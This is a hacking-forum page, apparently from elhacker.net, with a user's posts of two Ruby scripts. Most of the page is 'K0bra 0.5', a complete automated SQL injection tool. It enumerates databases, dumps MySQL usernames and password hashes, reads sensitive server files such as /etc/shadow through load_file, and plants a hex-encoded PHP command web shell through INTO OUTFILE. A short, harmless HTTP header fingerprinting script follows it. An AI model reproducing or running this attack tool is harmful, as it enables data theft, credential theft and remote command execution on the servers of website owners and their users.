elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: [Encuesta] ¿Qué editor de código utilizas? (2014)    


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 50
1  Programación / Scripting / [Ruby] K0bra 0.5 en: 24 Julio 2015, 18:12
Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina.

El script tiene las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

El codigo :

Código
  1. #!usr/bin/ruby
  2. #K0bra 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "net/http"
  6. require "open-uri"
  7.  
  8. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  9.  
  10. def toma(web)
  11.  begin
  12.    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13.  rescue
  14.    return "Error"
  15.  end
  16. end
  17.  
  18. def decode_hex(text)
  19.  text = text.sub("0x","")
  20.  return [text].pack('H*')[0]
  21. end
  22.  
  23. def encode_hex(text)
  24.  return "0x"+text.unpack('H*')[0]
  25. end
  26.  
  27. def copyright()
  28.  print "\n-- == (C) Doddy Hackman 2015 == --\n"
  29.  gets.chomp
  30.  exit(1)
  31. end
  32.  
  33. def installer()
  34.  dir = Dir::pwd+"/"+"logs_webs"
  35.  if not FileTest::directory?(dir)
  36.    Dir::mkdir(dir)
  37.  end
  38. end
  39.  
  40. def savefile(file,text)
  41.  url = URI.parse(file)
  42.  save = File.open("logs_webs/"+url.host+".txt","a")
  43.  save.puts text+"\n"
  44.  save.close
  45. end
  46.  
  47. def bypass(op)
  48.  if op=="--"
  49.    return "+","--"
  50.  elsif op=="/*"
  51.   return "/**/","/**/"
  52.  elsif op=="%20"
  53.   return "%20","%00"
  54.  else
  55.   return "+","--"    
  56.  end
  57. end
  58.  
  59. def head()
  60.  clean()
  61.  print "
  62.  
  63. @      @@   @            
  64. @@     @  @ @@            
  65. @ @@  @  @  @ @   @ @ @@@
  66. @ @   @  @  @@ @ @@@ @  @
  67. @@    @  @  @  @  @   @@@
  68. @ @   @  @  @  @  @  @  @
  69. @@@ @   @@   @@@  @@@ @@@@@
  70.  
  71. "
  72. end
  73.  
  74. def volverinicio()
  75.  print "\n\n[+] Press any key to continue\n\n"
  76.  gets.chomp
  77.  inicio()
  78. end
  79.  
  80. def clean()
  81.  if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
  82.    system("cls")
  83.  else
  84.    system("clear")
  85.  end
  86. end
  87.  
  88. def retorno(url,by)
  89.  print "\n[+] Finished"
  90.  print "\n\n[+] Press any key to continue\n\n"
  91.  gets.chomp
  92.  central(url,by)
  93. end
  94.  
  95. def gettables(url,by)
  96.  pass1,pass2 = bypass(by)
  97.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  98.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  99.  print "\n[+] Getting tables ...\n\n"
  100.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  101.  if code1=~/K0BRA(.*?)K0BRA/
  102.    total = $1
  103.    print "[+] Tables Found : ",total,"\n\n"
  104.    savefile(url,"\n[+] Tables Found : #{total}\n")
  105.    for num in ("17"..total)
  106.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
  107.      if code2=~/K0BRA(.*?)K0BRA/
  108.        table = $1
  109.        print "[+] Table Found : "+table+"\n"
  110.        savefile(url,"[+] Table Found : #{table}")
  111.      end
  112.    end
  113.  else
  114.    print "[-] Not Found\n"
  115.  end
  116. end
  117.  
  118. def getcolumns(url,by,tablex)
  119.  tablexa = encode_hex(tablex)
  120.  pass1,pass2 = bypass(by)
  121.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  122.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  123.  print "\n[+] Getting columns ...\n\n"
  124.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  125.  if code1=~/K0BRA(.*?)K0BRA/
  126.    total = $1
  127.    print "[+] Columns Found : ",total,"\n\n"
  128.    savefile(url,"\n[+] Table : #{tablex}")
  129.    savefile(url,"[+] Columns Found : #{total}\n")
  130.    for num in ("0"..total)
  131.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
  132.      if code2=~/K0BRA(.*?)K0BRA/
  133.        table = $1
  134.        print "[+] Column Found : "+table+"\n"
  135.        savefile(url,"[+] Column Found : #{table}")
  136.      end
  137.    end
  138.  else
  139.    print "[-] Not Found\n"
  140.  end
  141. end
  142.  
  143. def getdbs(url,by)
  144.  pass1,pass2 = bypass(by)
  145.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  146.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  147.  print "\n[+] Getting DBS ...\n\n"
  148.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  149.  if code1=~/K0BRA(.*?)K0BRA/
  150.    total = $1
  151.    print "[+] DBS Found : ",total,"\n\n"
  152.    savefile(url,"\n[+] DBS Found : #{total}\n")
  153.    for num in ("0"..total)
  154.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
  155.      if code2=~/K0BRA(.*?)K0BRA/
  156.        table = $1
  157.        print "[+] DB Found : "+table+"\n"
  158.        savefile(url,"[+] DB Found : #{table}")
  159.      end
  160.    end
  161.  else
  162.    print "[-] Not Found\n"
  163.  end
  164. end
  165.  
  166. def gettablesbydb(url,by,dbx)
  167.  data  = encode_hex(dbx)
  168.  pass1,pass2 = bypass(by)
  169.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  170.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  171.  print "\n[+] Getting tables ...\n\n"
  172.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  173.  if code1=~/K0BRA(.*?)K0BRA/
  174.    total = $1
  175.    print "[+] Tables Found : ",total,"\n\n"
  176.    savefile(url,"\n[+] DBS : #{dbx}")
  177.    savefile(url,"[+] Tables Found : #{total}\n")
  178.    for num in ("0"..total)
  179.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  180.      if code2=~/K0BRA(.*?)K0BRA/
  181.        table = $1
  182.        print "[+] Table Found : "+table+"\n"
  183.        savefile(url,"[+] Table Found : #{table}")
  184.      end
  185.    end
  186.  else
  187.    print "[-] Not Found\n"
  188.  end
  189. end
  190.  
  191. def getcolumnsbydb(url,by,db,tab)
  192.  data = encode_hex(db)
  193.  tabx = encode_hex(tab)
  194.  
  195.  pass1,pass2 = bypass(by)
  196.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  197.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  198.  print "\n[+] Getting columns ...\n\n"
  199.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  200.  if code1=~/K0BRA(.*?)K0BRA/
  201.    total = $1
  202.    print "[+] Columns Found : ",total,"\n\n"
  203.    savefile(url,"\n[+] DB : #{db}")
  204.    savefile(url,"[+] Table : #{tab}")
  205.    savefile(url,"[+] Columns Found : #{total}\n")
  206.    for num in ("0"..total)
  207.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  208.      if code2=~/K0BRA(.*?)K0BRA/
  209.        table = $1
  210.        print "[+] Column Found : "+table+"\n"
  211.        savefile(url,"[+] Column Found : #{table}")
  212.      end
  213.    end
  214.  else
  215.    print "[-] Not Found\n"
  216.  end
  217. end
  218.  
  219. def mysqluser(url,by)
  220.  pass1,pass2 = bypass(by)
  221.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  222.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  223.   print "\n[+] Searching mysql.user\n\n"
  224.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  225.  if code1=~/K0BRA(.*?)K0BRA/
  226.    total = $1
  227.    print "[+] Users Mysql Found : ",total,"\n\n"
  228.    savefile(url,"[+] Users Mysql Found : "+total+"\n")
  229.    for num in ("0"..total)
  230.      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
  231.      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
  232.        host,user,passw = $1,$2,$3
  233.        print "[Host] : "+host
  234.        print " [User] : "+user
  235.        print " [Pass] : "+passw+"\n"  
  236.        savefile(url,"[Host] : "+host)
  237.        savefile(url,"[User] : "+user)
  238.        savefile(url,"[Pass] : "+passw+"\n")
  239.      end
  240.    end
  241.  else
  242.    print "[-] Not Found\n"
  243.  end
  244. end
  245.  
  246. def details(url,by)
  247.  pass1,pass2 = bypass(by)
  248.  hextest = "0x2f6574632f706173737764" #/etc/passwd
  249.  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  250.  web1 = url.sub(/hackman/,"0x4b30425241")
  251.  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  252.  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  253.   print "\n[+] Extrating information of the DB\n"
  254.  code1 = toma(web2)
  255.  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
  256.    user,data,ver = $1,$2,$3
  257.    print "\n[+] Username : "+user
  258.    print "\n[+] Database : "+data
  259.    print "\n[+] Version : "+ver+"\n\n"
  260.    savefile(url,"\n[+] Username : "+user)
  261.    savefile(url,"[+] Database : "+data)
  262.    savefile(url,"[+] Version : "+ver+"\n")
  263.  else
  264.    print "[-] Not Found\n"
  265.  end
  266.   code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  267.   code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  268.   code4 = toma(web3)
  269.   if code2=~/K0BRA/
  270.     print "[+] Mysql User : ON\n"
  271.     savefile(url,"[+] Mysqluser : ON")
  272.   end
  273.   if code3=~/K0BRA/
  274.     print "[+] information_schema : ON\n"
  275.     savefile(url,"[+] information_schema : ON")
  276.   end
  277.   if code4=~/ERTOR854/
  278.     print "[+] load_file : ON\n"
  279.     savefile(url,"[+] load_file : ON")
  280.   end  
  281.   savefile(url,"") #espacio en blanco
  282. end
  283.  
  284. def dumper(url,by,table,col1,col2)
  285.  pass1,pass2 = bypass(by)
  286.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  287.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  288.  print "\n[+] Getting Values ...\n\n"
  289.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  290.  if code1=~/K0BRA(.*?)K0BRA/
  291.    total = $1
  292.    savefile(url,"\n[+] Table : "+table)
  293.    savefile(url,"[+] Column 1 : "+col1)
  294.    savefile(url,"[+] Column 2 : "+col2)
  295.    print "[+] Values Found : ",total,"\n"
  296.    savefile(url,"\n[+] Values Found : #{total}\n")
  297.    for num in ("0"..total)
  298.      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
  299.      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
  300.        uno,dos = $1,$2
  301.        print "\n[+] "+col1+" : "+uno+"\n"
  302.        print "[+] "+col2+" : "+dos+"\n"
  303.        savefile(url,"\n[+] "+col1+" : "+uno)
  304.        savefile(url,"[+] "+col2+" : "+dos)
  305.      end
  306.    end
  307.  else
  308.    print "[-] Not Found\n"
  309.  end
  310. end
  311.  
  312. def fuzzfile(url,by)
  313.  pass1,pass2 = bypass(by)
  314.  print "\n[+] Fuzzing Files with load_file ....\n"
  315.  $files.each do |file|
  316.    res = file
  317.    file = file.chomp
  318.    file = encode_hex(file)
  319.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  320.    code = toma(web1)
  321.    if code=~/ERTOR854(.*?)ERTOR854/m
  322.      print "\n\n[File Found] : ",res
  323.      print "\n\n[Source Start]\n"
  324.      print $1
  325.      print "\n[Source End]"
  326.      savefile(url,"\n[File Found] : "+res)
  327.      savefile(url,"\n[Source Start]\n")
  328.      savefile(url,$1)
  329.      savefile(url,"\n[Source End]")
  330.    end    
  331.  end
  332.  print "\n"
  333. end
  334.  
  335. def abrirfile(url,by,file)
  336.  pass1,pass2 = bypass(by)
  337.  print "\n[+] Opening file ....\n"
  338.  res = file
  339.  file = encode_hex(file)
  340.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  341.    code = toma(web1)
  342.    if code=~/ERTOR854(.*?)ERTOR854/m
  343.      print "\n\n[File Found] : ",res
  344.      print "\n\n[Source Start]\n"
  345.      print $1
  346.      print "\n[Source End]\n"
  347.      savefile(url,"\n[File Found] : "+res)
  348.      savefile(url,"\n[Source Start]\n")
  349.      savefile(url,$1)
  350.      savefile(url,"\n[Source End]\n")
  351.    else
  352.      print "\n\n[-] Error\n\n"
  353.    end
  354.  
  355. end
  356.  
  357. def into(url,by,full,dir)
  358.  pass1,pass2 = bypass(by)
  359.  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  360.  lugar = full+"/cmd.php"
  361.  lugardos = dir+"/cmd.php"
  362.  h = URI.parse(url)
  363.  webtest = "http://"+h.host+lugardos
  364.  web1 = url.sub(/hackman/,linea)
  365.  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  366.  toma(formandoweb)
  367.  code = toma(webtest)
  368.  if code=~/Mini Shell By Doddy/
  369.    print "\n[Shell Up] : "+webtest+"\n"
  370.    savefile(url,"\n[Shell Up] : "+webtest+"\n")
  371.  else
  372.    print "\n\n[-] Error\n"
  373.  end
  374. end
  375.  
  376. def central(url,by)
  377.  clean()
  378.  head()
  379.  print "\n\n[+] Page : #{url}\n"
  380.  print "[+] ByPass : #{by}\n\n"
  381.  
  382.  print "\n[information_schema]\n\n"
  383.  print "1 - Show tables\n"
  384.  print "2 - Show columns of the a table\n"
  385.  print "3 - Show databases\n"
  386.  print "4 - Show tables from the a DB\n"
  387.  print "5 - Show columns from the a table of the DB\n"
  388.  print "\n[mysql.user]\n\n"
  389.  print "6 - Show users\n"
  390.  print "\n[Others]\n\n"
  391.  print "7 - Show details\n"
  392.  print "8 - Dump data\n"
  393.  print "9 - Fuzz Files with load_file\n"
  394.  print "10 - Load files with load_file\n"
  395.  print "11 - Create Shell\n"
  396.  print "12 - Show log\n"
  397.  print "13 - Change target\n"
  398.  print "14 - Exit\n\n\n"
  399.  
  400.  print "[+] Option : "
  401.  op = gets.chomp
  402.  print "\n"
  403.  
  404.  if op == "1"
  405.    gettables(url,by)
  406.    retorno(url,by)
  407.  elsif op == "2"
  408.    print "\n[+] Table : "
  409.    table = gets.chomp
  410.    getcolumns(url,by,table)
  411.    retorno(url,by)
  412.  elsif op == "3"
  413.    getdbs(url,by)
  414.    retorno(url,by)
  415.  elsif op == "4"
  416.    print "\n[+] DB : "
  417.    db = gets.chomp
  418.    gettablesbydb(url,by,db)
  419.    retorno(url,by)
  420.  elsif op == "5"
  421.    print "\n[+] DB : "
  422.    db = gets.chomp
  423.    print "\n[+] Table : "
  424.    tab = gets.chomp
  425.    getcolumnsbydb(url,by,db,tab)
  426.    retorno(url,by)
  427.  elsif op == "6"
  428.    mysqluser(url,by)
  429.    retorno(url,by)
  430.  elsif op == "7"
  431.    details(url,by)
  432.    retorno(url,by)
  433.  elsif op == "8"
  434.    print "\n[+] Table : "
  435.    table = gets.chomp
  436.    print "\n[+] Column 1 : "
  437.    col1 = gets.chomp
  438.    print "\n[+] Column 2 : "
  439.    col2 = gets.chomp
  440.    dumper(url,by,table,col1,col2)
  441.    retorno(url,by)
  442.  elsif op == "9"
  443.    fuzzfile(url,by)
  444.    retorno(url,by)
  445.  elsif op == "10"
  446.    print "\n[+] File : "
  447.    file = gets.chomp
  448.    abrirfile(url,by,file)
  449.    retorno(url,by)
  450.  elsif op == "11"
  451.    print "\n[Full Source Discloure] : "
  452.    full = gets.chomp
  453.    print "\n[Directory to test] : "
  454.    dir = gets.chomp
  455.    into(url,by,full,dir)
  456.    retorno(url,by)
  457.  elsif op == "12"
  458.    urla = URI.parse(url)
  459.    ar = "logs_webs/"+urla.host+".txt"
  460.    system("start #{ar}")
  461.    retorno(url,by)
  462.  elsif op == "13"
  463.    inicio()
  464.  elsif op == "14"
  465.    copyright()
  466.  else
  467.    retorno(url,by)
  468.  end
  469. end
  470.  
  471. def findlength(url,by)
  472.  pass1,pass2 = bypass(by)
  473.  z = "1"
  474.  print "\n[+] Finding columns lenght ...\n\n"
  475.  x = "concat(0x4b30425241,1,0x4b30425241)"
  476.  for num in ('2'..'25')
  477.    z = z+","+num
  478.    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  479.    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
  480.    if code=~/K0BRA(.*?)K0BRA/
  481.      print "[+] The Page has "+num+" columns\n"
  482.      print "[+] The number "+$1+" print data"
  483.      z = z.sub($1,"hackman")
  484.      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
  485.      savefile(url,"[+] SQLI : "+sqli)
  486.      savefile(url,"[+] Bypass : "+by+"\n")
  487.      central(sqli,by)
  488.    end
  489.  end
  490.  print "[-] Columns lenght not found\n"
  491.  volverinicio()
  492. end
  493.  
  494. def testvul(page,by)
  495.  pass1,pass2 = bypass(by)
  496.  print "\n\n[+] Testing vulnerability ...\n\n"
  497.  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  498.  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  499.  if codeuno != codedos
  500.    print "[+] Vulnerable !\n"
  501.    findlength(page,by)
  502.  else
  503.    print "[-] Not vulnerable\n"
  504.    print "\n[+] Scan anyway y/n : "
  505.    op = gets.chomp
  506.    if op == "y"
  507.      findlength(page,by)
  508.    else
  509.      volverinicio()
  510.  end
  511. end  
  512. end
  513.  
  514. def inicio()
  515.  clean()
  516.  head()
  517.  print "\n\n[+] Page : "
  518.  page = gets.chomp
  519.  print "\n[+] Bypass : "
  520.  by = gets.chomp
  521.  if page=~/hackman/
  522.    central(page,by)
  523.  else
  524.    testvul(page,by)
  525.  end
  526. end
  527.  
  528. installer()
  529. inicio()
  530.  
  531. # The End ?
  532.  

Eso es todo.
2  Programación / Scripting / [Ruby] HTTP FingerPrinting 0.2 en: 12 Julio 2015, 17:27
Un simple script en Ruby para hacer HTTP FingerPrinting.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #HTTP FingerPrinting 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "net/http"
  6.  
  7. # Functions
  8.  
  9. def httpfinger(page)
  10. respuesta = ""
  11. begin
  12. nave = Net::HTTP.start(page)
  13. headers = nave.head("/")
  14. headers.each do |name,value|
  15. respuesta = respuesta + "[+] "+name+" : "+value+"\n"
  16. end
  17. nave.finish
  18. rescue
  19. respuesta = "Error"
  20. end
  21. return respuesta
  22. end
  23.  
  24. def uso
  25. print "\n[+] Sintax : ruby httpfinger.rb <target>\n"
  26. end
  27.  
  28. def  head
  29. print "\n-- == HTTP FingerPrinting 0.2 == --\n\n"
  30. end
  31.  
  32. def copyright
  33. print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  34. end
  35.  
  36. #
  37.  
  38. target = ARGV[0]
  39.  
  40. head()
  41.  
  42. if !target
  43. uso()
  44. else
  45. print "\n[+] Searching ...\n\n"
  46. print httpfinger(target)
  47. print "\n[+] Finished\n"
  48. end
  49.  
  50. copyright()
  51.  
  52. #The End ?
